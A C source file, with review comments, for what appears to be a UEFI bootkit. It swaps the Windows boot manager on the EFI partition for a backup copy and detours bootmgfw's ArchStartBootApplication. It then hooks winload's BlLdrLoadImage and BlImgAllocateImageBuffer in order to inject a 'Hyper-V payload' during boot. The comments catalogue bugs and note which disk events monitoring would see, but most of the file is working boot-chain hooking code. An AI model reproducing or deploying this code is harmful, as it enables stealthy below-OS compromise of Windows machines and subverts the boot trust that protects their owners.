#include "BootMgfw.h"
// Hook record for the bootmgfw ArchStartBootApplication detour. Filled in by
// MakeShitHook() in InstallBootMgfwHooks(); ArchStartBootApplicationHook()
// disables it and calls through its .Address member. Global mutable state
// with no locking; the boot-time code here is single-threaded as written.
SHITHOOK BootMgfwShitHook;
// Restore the on-disk boot manager from its backup copy.
//
// Walks every handle that exposes the Simple File System protocol, and on the
// first volume where WINDOWS_BOOTMGFW_PATH can be opened it:
//   1. deletes WINDOWS_BOOTMGFW_PATH,
//   2. reads WINDOWS_BOOTMGFW_BACKUP_PATH fully into a pool buffer,
//   3. deletes the backup,
//   4. re-creates WINDOWS_BOOTMGFW_PATH and writes the buffered bytes to it.
//
// Returns EFI_SUCCESS once a volume has been processed, the failing EFI_STATUS
// on any error, or EFI_ABORTED if no volume contained WINDOWS_BOOTMGFW_PATH.
//
// NOTE(review): the sequence is not crash-safe. Between the first Delete and the
// final Write the volume holds neither a boot manager nor a backup (the backup
// is deleted before the new file is created), so an interruption there leaves
// the ESP without a bootable bootmgfw.efi. From a file-integrity-monitoring
// standpoint the delete/create pair on the ESP is the observable event.
//
// NOTE(review): resource handling is one-way. `Handles` is freed only on the
// EFI_ABORTED path; every other return leaves it allocated. `BootMgfwHandle`
// (opened read-only as the existence probe) is never closed, and
// `VolumeHandle` is closed only on the branch where the probe succeeded.
// Both AllocatePool calls are unchecked, and `FileInfoPtr` is dereferenced
// unconditionally afterwards, so a GetInfo that does not report
// EFI_BUFFER_TOO_SMALL on the first (NULL-buffer) call leads to a NULL
// dereference.
EFI_STATUS EFIAPI RestoreBootMgfw(VOID)
{
    UINTN HandleCount = NULL; // integer initialised with NULL; 0 is the conventional value
    EFI_STATUS Result;
    EFI_HANDLE* Handles = NULL;
    EFI_FILE_HANDLE VolumeHandle;
    EFI_FILE_HANDLE BootMgfwHandle;
    EFI_FILE_IO_INTERFACE* FileSystem = NULL;

    // Enumerate every file-system handle in the system; Handles is pool memory
    // owned by this function.
    if (EFI_ERROR((Result = gBS->LocateHandleBuffer(ByProtocol, &gEfiSimpleFileSystemProtocolGuid, NULL, &HandleCount, &Handles))))
    {
        DBG_PRINT("error getting file system handles -> 0x%p\n", Result);
        return Result;
    }

    // Idx is UINT32 while HandleCount is UINTN; fine for any realistic handle count.
    for (UINT32 Idx = 0u; Idx < HandleCount; ++Idx)
    {
        if (EFI_ERROR((Result = gBS->OpenProtocol(Handles[Idx], &gEfiSimpleFileSystemProtocolGuid, (VOID**)&FileSystem, gImageHandle, NULL, EFI_OPEN_PROTOCOL_GET_PROTOCOL))))
        {
            DBG_PRINT("error opening protocol -> 0x%p\n", Result);
            return Result;
        }

        if (EFI_ERROR((Result = FileSystem->OpenVolume(FileSystem, &VolumeHandle))))
        {
            DBG_PRINT("error opening file system -> 0x%p\n", Result);
            return Result;
        }

        // Existence probe: a successful read-only open selects this volume.
        // On failure the loop falls through to CloseProtocol and the next handle
        // (VolumeHandle is left open on that path).
        if (!EFI_ERROR((Result = VolumeHandle->Open(VolumeHandle, &BootMgfwHandle, WINDOWS_BOOTMGFW_PATH, EFI_FILE_MODE_READ, EFI_FILE_READ_ONLY))))
        {
            VolumeHandle->Close(VolumeHandle); // BootMgfwHandle itself is never closed
            EFI_FILE_PROTOCOL* BootMgfwFile = NULL;
            EFI_DEVICE_PATH* BootMgfwPathProtocol = FileDevicePath(Handles[Idx], WINDOWS_BOOTMGFW_PATH);

            // open bootmgfw as read/write then delete it...
            if (EFI_ERROR((Result = EfiOpenFileByDevicePath(&BootMgfwPathProtocol, &BootMgfwFile, EFI_FILE_MODE_WRITE | EFI_FILE_MODE_READ, NULL))))
            {
                DBG_PRINT("error opening bootmgfw... reason -> %r\n", Result);
                return Result;
            }

            // Delete() also closes the handle, so BootMgfwFile is reused below.
            if (EFI_ERROR((Result = BootMgfwFile->Delete(BootMgfwFile))))
            {
                DBG_PRINT("error deleting bootmgfw... reason -> %r\n", Result);
                return Result;
            }

            // open bootmgfw.efi.backup
            // The device path returned by the first FileDevicePath() call is
            // overwritten here without being freed.
            BootMgfwPathProtocol = FileDevicePath(Handles[Idx], WINDOWS_BOOTMGFW_BACKUP_PATH);
            if (EFI_ERROR((Result = EfiOpenFileByDevicePath(&BootMgfwPathProtocol, &BootMgfwFile, EFI_FILE_MODE_WRITE | EFI_FILE_MODE_READ, NULL))))
            {
                DBG_PRINT("failed to open backup file... reason -> %r\n", Result);
                return Result;
            }

            EFI_FILE_INFO* FileInfoPtr = NULL;
            UINTN FileInfoSize = NULL; // integer initialised with NULL; 0 is the conventional value

            // get the size of bootmgfw.efi.backup...
            // Standard two-call pattern: the NULL-buffer call is expected to fail
            // with EFI_BUFFER_TOO_SMALL and report the required size.
            if (EFI_ERROR((Result = BootMgfwFile->GetInfo(BootMgfwFile, &gEfiFileInfoGuid, &FileInfoSize, NULL))))
            {
                if (Result == EFI_BUFFER_TOO_SMALL)
                {
                    // Return value unchecked; FileInfoPtr stays NULL on allocation failure.
                    gBS->AllocatePool(EfiBootServicesData, FileInfoSize, &FileInfoPtr);
                    if (EFI_ERROR(Result = BootMgfwFile->GetInfo(BootMgfwFile, &gEfiFileInfoGuid, &FileInfoSize, FileInfoPtr)))
                    {
                        DBG_PRINT("get backup file information failed... reason -> %r\n", Result);
                        return Result;
                    }
                }
                else
                {
                    DBG_PRINT("Failed to get file information... reason -> %r\n", Result);
                    return Result;
                }
            }
            // If the first GetInfo did not error, FileInfoPtr is still NULL here.

            VOID* BootMgfwBuffer = NULL;
            UINTN BootMgfwSize = FileInfoPtr->FileSize;
            // Return value unchecked; BootMgfwBuffer stays NULL on allocation failure.
            gBS->AllocatePool(EfiBootServicesData, FileInfoPtr->FileSize, &BootMgfwBuffer);

            // read the backup file into an allocated pool...
            // Read() updates BootMgfwSize with the byte count actually read; a
            // short read is not detected here.
            if (EFI_ERROR((Result = BootMgfwFile->Read(BootMgfwFile, &BootMgfwSize, BootMgfwBuffer))))
            {
                DBG_PRINT("Failed to read backup file into buffer... reason -> %r\n", Result);
                return Result;
            }

            // delete the backup file...
            if (EFI_ERROR((Result = BootMgfwFile->Delete(BootMgfwFile))))
            {
                DBG_PRINT("unable to delete backup file... reason -> %r\n", Result);
                return Result;
            }

            // create a new bootmgfw file...
            BootMgfwPathProtocol = FileDevicePath(Handles[Idx], WINDOWS_BOOTMGFW_PATH);
            if (EFI_ERROR((Result = EfiOpenFileByDevicePath(&BootMgfwPathProtocol, &BootMgfwFile, EFI_FILE_MODE_CREATE | EFI_FILE_MODE_WRITE | EFI_FILE_MODE_READ, EFI_FILE_SYSTEM))))
            {
                DBG_PRINT("unable to create new bootmgfw on disk... reason -> %r\n", Result);
                return Result;
            }

            // write the data from the backup file to the new bootmgfw file...
            // Size is reset from FileInfo rather than from the count Read() returned.
            BootMgfwSize = FileInfoPtr->FileSize;
            if (EFI_ERROR((Result = BootMgfwFile->Write(BootMgfwFile, &BootMgfwSize, BootMgfwBuffer))))
            {
                DBG_PRINT("unable to write to newly created bootmgfw.efi... reason -> %r\n", Result);
                return Result;
            }

            // Close() is the only flush point for the newly written file; its
            // status is not checked.
            BootMgfwFile->Close(BootMgfwFile);
            gBS->FreePool(FileInfoPtr);
            gBS->FreePool(BootMgfwBuffer);
            return EFI_SUCCESS; // Handles is not freed on this path
        }

        if (EFI_ERROR((Result = gBS->CloseProtocol(Handles[Idx], &gEfiSimpleFileSystemProtocolGuid, gImageHandle, NULL))))
        {
            DBG_PRINT("error closing protocol -> 0x%p\n", Result);
            return Result;
        }
    }

    // No volume contained WINDOWS_BOOTMGFW_PATH.
    gBS->FreePool(Handles);
    return EFI_ABORTED;
}
// Install the detour on the loaded bootmgfw image.
//
// @param BootMgfwPath  Despite the name this is the image *handle* of the loaded
//                      bootmgfw (it is passed straight to HandleProtocol with
//                      gEfiLoadedImageProtocolGuid), not a device or file path.
// @return The HandleProtocol error if the loaded-image protocol is unavailable,
//         EFI_ABORTED if the byte pattern is not found in the image, otherwise
//         EFI_SUCCESS (the value Result was initialised with).
//
// NOTE(review): the two Print() calls are unconditional console output, unlike
// the DBG_PRINT used elsewhere in this file; and the DBG_PRINT here is given a
// wide (L"") literal whereas RestoreBootMgfw passes narrow ones — one of the two
// is presumably wrong depending on how DBG_PRINT is defined. Whatever
// MakeShitHook() reports, if anything, is not examined before returning success.
EFI_STATUS EFIAPI InstallBootMgfwHooks(EFI_HANDLE BootMgfwPath)
{
    EFI_STATUS Result = EFI_SUCCESS;
    EFI_LOADED_IMAGE* BootMgfw = NULL;

    if (EFI_ERROR((Result = gBS->HandleProtocol(BootMgfwPath, &gEfiLoadedImageProtocolGuid, (VOID**)&BootMgfw))))
        return Result;

    Print(L"Image Base -> 0x%p\n", BootMgfw->ImageBase);
    Print(L"Image Size -> 0x%x\n", BootMgfw->ImageSize);
    // Byte-pattern scan of the in-memory image; pattern and mask come from the header.
    VOID* ArchStartBootApplication =
        FindPattern(
            BootMgfw->ImageBase,
            BootMgfw->ImageSize,
            START_BOOT_APPLICATION_SIG,
            START_BOOT_APPLICATION_MASK
        );

    // Pattern not present in this bootmgfw build: nothing is patched.
    if (!ArchStartBootApplication)
        return EFI_ABORTED;

    DBG_PRINT(L"ArchStartBootApplication -> 0x%p\n", ArchStartBootApplication);
    // Records the original address in the global BootMgfwShitHook and redirects
    // the located function to ArchStartBootApplicationHook (TRUE presumably
    // enables the hook immediately — confirm against MakeShitHook).
    MakeShitHook(&BootMgfwShitHook, ArchStartBootApplication, &ArchStartBootApplicationHook, TRUE);
    return Result;
}
// Detour for bootmgfw's ArchStartBootApplication.
//
// Runs in place of the original once, for the application whose image the
// code's own log lines identify as winload. It removes its own hook, locates
// two winload routines (BlLdrLoadImage via export lookup, BlImgAllocateImageBuffer
// via byte-pattern scan), installs detours on both when found, and then
// tail-calls the original ArchStartBootApplication with the unmodified
// arguments. The parameter list is assumed to match the original's signature
// (IMG_ARCH_START_BOOT_APPLICATION) — confirm in the header.
//
// @return Whatever the original ArchStartBootApplication returns.
//
// NOTE(review): the else branch prints "aborting" but does not abort — control
// still falls through to the original call, so the boot proceeds without the
// winload hooks. The Print() calls are unconditional console output, and
// PayLoadSize() is called only to be printed.
EFI_STATUS EFIAPI ArchStartBootApplicationHook(VOID* AppEntry, VOID* ImageBase, UINT32 ImageSize, UINT8 BootOption, VOID* ReturnArgs)
{
    // Undo the bootmgfw detour first; BootMgfwShitHook.Address is used below to
    // reach the original routine, so the hook record must stay intact.
    DisableShitHook(&BootMgfwShitHook);
    VOID* LdrLoadImage = GetExport(ImageBase, "BlLdrLoadImage");
    VOID* ImgAllocateImageBuffer =
        FindPattern(
            ImageBase,
            ImageSize,
            ALLOCATE_IMAGE_BUFFER_SIG,
            ALLOCATE_IMAGE_BUFFER_MASK
        );

    Print(L"Hyper-V PayLoad Size -> 0x%x\n", PayLoadSize());
    Print(L"winload base -> 0x%p\n", ImageBase);
    Print(L"winload size -> 0x%x\n", ImageSize);
    Print(L"winload.BlLdrLoadImage -> 0x%p\n", LdrLoadImage);
    Print(L"winload.BlImgAllocateImageBuffer -> 0x%p\n", ImgAllocateImageBuffer);

    // Both targets must resolve; otherwise nothing in winload is patched.
    if (ImgAllocateImageBuffer && LdrLoadImage)
    {
        // WinLoadImageShitHook / WinLoadAllocateImageHook and the two replacement
        // routines are defined outside this file.
        MakeShitHook(&WinLoadImageShitHook, LdrLoadImage, &BlLdrLoadImage, TRUE);
        MakeShitHook(&WinLoadAllocateImageHook, ImgAllocateImageBuffer, &BlImgAllocateImageBuffer, TRUE);
    }
    else
    {
        // Not an abort: execution continues to the original call below.
        Print(L"nullptr detected, aborting...\n");
        Print(L"Please submit a screenshot of this...\n");
    }
    // Tail-call the original with the caller's arguments unchanged.
    return ((IMG_ARCH_START_BOOT_APPLICATION)BootMgfwShitHook.Address)(AppEntry, ImageBase, ImageSize, BootOption, ReturnArgs);
}